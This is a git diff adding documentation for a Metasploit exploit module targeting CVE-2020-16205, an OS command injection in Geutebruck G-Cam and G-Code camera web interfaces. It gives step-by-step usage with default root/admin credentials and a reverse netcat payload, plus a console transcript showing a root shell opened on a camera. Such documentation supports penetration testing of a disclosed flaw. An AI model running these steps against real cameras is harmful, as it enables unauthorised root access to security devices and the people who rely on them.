diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
new file mode 100644
index 0000000000..242bbc9f79
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models:
+G-Code: 
+ EEC-2xxx
+G-Cam: 
+ EBC-21xx
+ EFD-22xx
+ ETHC-22xx
+ EWPC-22xx
+
+### Description
+
+This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
+Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
+Tested it with the 1.12.14.5 firmware only.
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+  1. Do: `use exploit/linux/http/geutebruck_testaction_exec`
+  2. Do: `set httpusername root`
+  3. Do: `set httppassword admin`
+  4. Do: `set lhost 192.168.14.1`
+  5. Do: `set rhosts 192.168.14.58`
+  6. Do: `set payload cmd/unix/reverse_netcat_gaping`
+  7. Do: `check`
+  8. Do: `exploit`
+
+## Options
+
+ ### HTTPUSERNAME
+
+ A username used to authenticate on the admin page. **Default: root**
+
+ ### HTTPPASSWORD
+
+The password of the username used to authenticate on the admin page. **Default: admin**
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/geutebruck_testaction_exec
+msf5 exploit(linux/http/geutebruck_testaction_exec) >
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
+payload => cmd/unix/reverse_netcat_gaping
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
+httpusername => root
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin
+httppassword => admin
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1
+lhost => 192.168.14.1
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58
+rhosts => 192.168.14.58
+msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.14.1:4444
+[*] 192.168.14.58:80 - Attempting to exploit...
+[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200
+pwd
+
+/tmp/www_ramdisk/uapi-cgi/admin
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux
+```